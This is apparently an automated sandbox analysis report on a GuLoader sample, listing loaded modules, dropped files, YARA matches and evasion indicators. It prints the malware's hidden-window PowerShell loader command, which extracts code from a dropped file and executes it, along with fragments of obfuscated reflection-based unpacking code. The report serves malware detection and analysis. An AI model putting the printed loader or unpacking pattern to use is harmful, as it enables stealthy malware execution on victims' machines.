      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: crtdll.dllJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: indows\System.Core.pdb@ source: powershell.exe, 00000002.00000002.2546703492.0000000008384000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbssio source: powershell.exe, 00000002.00000002.2546703492.0000000008332000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2546703492.0000000008384000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2546703492.0000000008332000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000008.00000002.2613773694.0000000005D6B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.2547628074.000000000B13B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Found suspicious powershell code related to unpacking or dynamic code loading
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Vitiferous $Orinasal $Codi), (Microvillus @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Indbringendes = [AppDomain]::CurrentDomain.GetAssemblies()$global
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Countervailed)), $malakiass).DefineDynamicModule($Unflippantly, $false).DefineType($Underhammer, $Erhvervsregistrerede, [System.Multic
      Suspicious powershell command line found
      Source: C:\Users\user\Desktop\DOCU800147001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) "
      Source: C:\Users\user\Desktop\DOCU800147001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) "Jump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00405EA5 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EA5
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074C9770 pushad ; iretd 2_2_074C9789
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074C0FC4 push es; iretd 2_2_074C0FC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074C61B9 push cs; ret 2_2_074C61BF
      Source: C:\Users\user\Desktop\DOCU800147001.exeFile created: C:\Users\user\AppData\Local\Temp\nsx7F0.tmp\nsExec.dllJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\DOCU800147001.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6538Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3167Jump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx7F0.tmp\nsExec.dllJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5012Thread sleep time: -7378697629483816s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00405E7E FindFirstFileA,FindClose,0_2_00405E7E
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_0040543A GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040543A
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00402647 FindFirstFileA,0_2_00402647
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: decouple.Chr.0.drBinary or memory string: arVMcI}1
      Source: msiexec.exe, 00000008.00000002.2616759739.0000000006A02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[
      Source: powershell.exe, 00000002.00000002.2527630104.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
      Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
